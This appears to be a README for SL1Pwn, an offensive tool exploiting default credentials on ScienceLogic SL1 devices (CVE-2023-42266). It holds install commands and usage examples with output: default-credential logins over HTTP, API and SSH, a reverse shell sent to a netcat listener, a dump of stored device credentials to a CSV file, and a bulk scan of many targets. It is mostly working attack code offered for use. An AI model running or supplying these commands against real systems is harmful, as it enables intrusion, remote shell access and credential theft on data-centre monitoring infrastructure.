This tool utilizes default credentials to obtain a reverse shell, dump credentials, and login via HTTP and SSH (single or bulk) on ScienceLogic SL1 devices. If default credentials are not correct, you can supply your own.
Recognized as CVE-2023-42266
Hacking the Heartbeat Monitor of a Data Center - ScienceLogic SL1
git clone https://github.com/3NailsInfoSec/SL1Pwn.git
cd SL1Pwn
pip3 install -r requirements.txt
python3 sl1pwn.py -t 1.1.1.1
[+] UI Login Success! https://1.1.1.1:443
[+] API Login Success! https://1.1.1.1:443
python3 sl1pwn.py -t 1.1.1.1 -p 22 -user em7admin -pass admin123
[+] Possible SSH success 1.1.1.1:22
python3 sl1pwn.py -t 1.1.1.1 -shell -L 2.2.2.2 -P 4444
[+] UI Login Success! https://1.1.1.1:443
[+] API Login Success! https://1.1.1.1:443
[*] Created action with name: kjsKKe
[*] Created schedule successfully: 25
[*] Created automation successfully: 115
[+] Run book executed! Press enter when ready to clean up...
[*] Deleted action[121]: kjsKKe
[*] Deleted schedule[25]: kjsKKe
[*] Deleted automation[115]: kjsKKe
# nc -lvp 4444
Connection received on 1.1.1.1 45352
sh-4.2$
python3 sl1pwn.py -t 1.1.1.1 -dump -o target_creds.csv
[*] Dumping 1.1.1.1::22 stored api credentials
[LifeSize: Endpoint SNMP]
[Cisco: CSP SNMP Port 161 Example]
[Cisco: CSP SNMP Port 1610 Exampl]
[Dell EMC: Isilon SNMPv2 Example]
[Cisco SNMPv3 - Example]
[Cisco SNMPv2 - Example]
[*] Saved to target_creds.csv
python3 sl1pwn.py -scan targets.txt -threads 25
[+] UI Login Success! https://1.1.1.1:443
[+] API Login Success! https://1.1.1.1:443
[+] UI Login Success! https://1.1.1.2:443
[+] API Login Success! https://1.1.1.2:443